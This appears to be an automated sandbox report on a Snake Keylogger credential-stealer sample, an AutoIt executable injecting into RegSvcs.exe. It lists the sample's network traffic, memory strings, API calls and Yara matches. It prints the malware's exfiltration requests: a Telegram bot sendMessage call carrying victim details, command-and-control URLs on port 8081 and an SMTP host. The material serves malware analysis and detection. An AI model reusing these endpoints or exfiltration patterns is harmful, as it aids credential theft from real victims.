Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2009/03/2025%20/%2005:28:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: us2.smtp.mailhostbox.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 20:16:32 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: RegSvcs.exe, 00000001.00000002.3355927662.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: 3c638k0NJx.exe, 00000000.00000002.885590398.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3353910246.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: 3c638k0NJx.exe, 00000000.00000002.885590398.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3355927662.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3353910246.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: 3c638k0NJx.exe, 00000000.00000002.885590398.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3355927662.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3353910246.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: RegSvcs.exe, 00000001.00000002.3355927662.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000001.00000002.3355927662.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: 3c638k0NJx.exe, 00000000.00000002.885590398.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3353910246.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000001.00000002.3355927662.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000001.00000002.3355927662.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: 3c638k0NJx.exe, 00000000.00000002.885590398.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3355927662.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3353910246.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: RegSvcs.exe, 00000001.00000002.3357320929.0000000003F27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: RegSvcs.exe, 00000001.00000002.3355927662.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: 3c638k0NJx.exe, 00000000.00000002.885590398.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3355927662.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3353910246.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: RegSvcs.exe, 00000001.00000002.3355927662.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: RegSvcs.exe, 00000001.00000002.3355927662.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20a
Source: RegSvcs.exe, 00000001.00000002.3357320929.0000000003F27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegSvcs.exe, 00000001.00000002.3357320929.0000000003CD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3357320929.0000000003F27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegSvcs.exe, 00000001.00000002.3357320929.0000000003CD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3357320929.0000000003F27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegSvcs.exe, 00000001.00000002.3355927662.0000000002DA2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3355927662.0000000002DD4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3355927662.0000000002D93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: RegSvcs.exe, 00000001.00000002.3355927662.0000000002DA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en4
Source: RegSvcs.exe, 00000001.00000002.3355927662.0000000002D9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: RegSvcs.exe, 00000001.00000002.3357320929.0000000003F27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegSvcs.exe, 00000001.00000002.3357320929.0000000003CD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3357320929.0000000003F27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: RegSvcs.exe, 00000001.00000002.3357320929.0000000003F27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegSvcs.exe, 00000001.00000002.3357320929.0000000003F27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: RegSvcs.exe, 00000001.00000002.3355927662.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3355927662.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3355927662.0000000002CCE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: 3c638k0NJx.exe, 00000000.00000002.885590398.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3355927662.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3353910246.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000001.00000002.3355927662.0000000002CCE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: RegSvcs.exe, 00000001.00000002.3355927662.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3355927662.0000000002C89000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3355927662.0000000002CCE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: RegSvcs.exe, 00000001.00000002.3357320929.0000000003CD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3357320929.0000000003F27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: RegSvcs.exe, 00000001.00000002.3357320929.0000000003CD1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3357320929.0000000003F27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: RegSvcs.exe, 00000001.00000002.3355927662.0000000002DD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: RegSvcs.exe, 00000001.00000002.3355927662.0000000002DD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/4
Source: RegSvcs.exe, 00000001.00000002.3355927662.0000000002DCF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49689
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49683
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49682
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown	Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49689 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49687 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49682 -> 443

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49698 version: TLS 1.2

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Code function: 0_2_00CA4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00CA4164

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Code function: 0_2_00CA4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00CA4164

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Code function: 0_2_00CA3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00CA3F66

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Code function: 0_2_00C9001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00C9001C

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Code function: 0_2_00CBCABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00CBCABC

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.3c638k0NJx.exe.da0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.3c638k0NJx.exe.da0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.3c638k0NJx.exe.da0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.3c638k0NJx.exe.da0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.3c638k0NJx.exe.da0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.3c638k0NJx.exe.da0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000000.00000002.885590398.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.885590398.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000000.00000002.885590398.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000001.00000002.3353910246.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: 3c638k0NJx.exe PID: 7156, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 6320, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00C33B3A
Source: 3c638k0NJx.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: 3c638k0NJx.exe, 00000000.00000002.885195299.0000000000CE4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_8209255d-a
Source: 3c638k0NJx.exe, 00000000.00000002.885195299.0000000000CE4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_310948ba-2

Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C33633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,	0_2_00C33633
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00CBC1AC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,	0_2_00CBC1AC
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00CBC498 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,	0_2_00CBC498
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00CBC5FE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,	0_2_00CBC5FE
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00CBC57D SendMessageW,NtdllDialogWndProc_W,	0_2_00CBC57D
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00CBC88F NtdllDialogWndProc_W,	0_2_00CBC88F
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00CBC8BE NtdllDialogWndProc_W,	0_2_00CBC8BE
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00CBC860 NtdllDialogWndProc_W,	0_2_00CBC860
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00CBC909 NtdllDialogWndProc_W,	0_2_00CBC909
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00CBC93E ClientToScreen,NtdllDialogWndProc_W,	0_2_00CBC93E
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00CBCABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	0_2_00CBCABC
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00CBCA7C GetWindowLongW,NtdllDialogWndProc_W,	0_2_00CBCA7C
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C31287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,74D9C8D0,NtdllDialogWndProc_W,	0_2_00C31287
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C31290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,	0_2_00C31290
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00CBD3B8 NtdllDialogWndProc_W,	0_2_00CBD3B8
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00CBD43E GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,	0_2_00CBD43E
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C316DE GetParent,NtdllDialogWndProc_W,	0_2_00C316DE
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C316B5 NtdllDialogWndProc_W,	0_2_00C316B5
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C3167D NtdllDialogWndProc_W,	0_2_00C3167D
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00CBD78C NtdllDialogWndProc_W,	0_2_00CBD78C
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C3189B NtdllDialogWndProc_W,	0_2_00C3189B
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00CBBC5D NtdllDialogWndProc_W,CallWindowProcW,	0_2_00CBBC5D
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00CBBF8C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,	0_2_00CBBF8C
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00CBBF30 NtdllDialogWndProc_W,	0_2_00CBBF30

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Code function: 0_2_00C9A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_00C9A1EF

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Code function: 0_2_00C88310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,752D5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,

0_2_00C88310

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Code function: 0_2_00C951BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_00C951BD

Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C3E6A0	0_2_00C3E6A0
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C5D975	0_2_00C5D975
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C3FCE0	0_2_00C3FCE0
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C521C5	0_2_00C521C5
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C662D2	0_2_00C662D2
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00CB03DA	0_2_00CB03DA
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C6242E	0_2_00C6242E
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C525FA	0_2_00C525FA
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C466E1	0_2_00C466E1
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C8E616	0_2_00C8E616
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C6878F	0_2_00C6878F
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C98889	0_2_00C98889
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C66844	0_2_00C66844
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00CB0857	0_2_00CB0857
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C48808	0_2_00C48808
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C5CB21	0_2_00C5CB21
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C66DB6	0_2_00C66DB6
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C46F9E	0_2_00C46F9E
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C43030	0_2_00C43030
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C5F1D9	0_2_00C5F1D9
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C53187	0_2_00C53187
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C31287	0_2_00C31287
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C51484	0_2_00C51484
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C45520	0_2_00C45520
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C57696	0_2_00C57696
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C45760	0_2_00C45760
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C51978	0_2_00C51978
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C69AB5	0_2_00C69AB5
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00CB7DDB	0_2_00CB7DDB
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C51D90	0_2_00C51D90
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C5BDA6	0_2_00C5BDA6
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C43FE0	0_2_00C43FE0
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C3DF00	0_2_00C3DF00
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00D93600	0_2_00D93600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_014AC146	1_2_014AC146
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_014A5370	1_2_014A5370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_014AD278	1_2_014AD278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_014AC468	1_2_014AC468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_014AC738	1_2_014AC738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_014AE988	1_2_014AE988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_014A69A0	1_2_014A69A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_014A3B95	1_2_014A3B95
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_014ACA08	1_2_014ACA08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_014A9DE0	1_2_014A9DE0
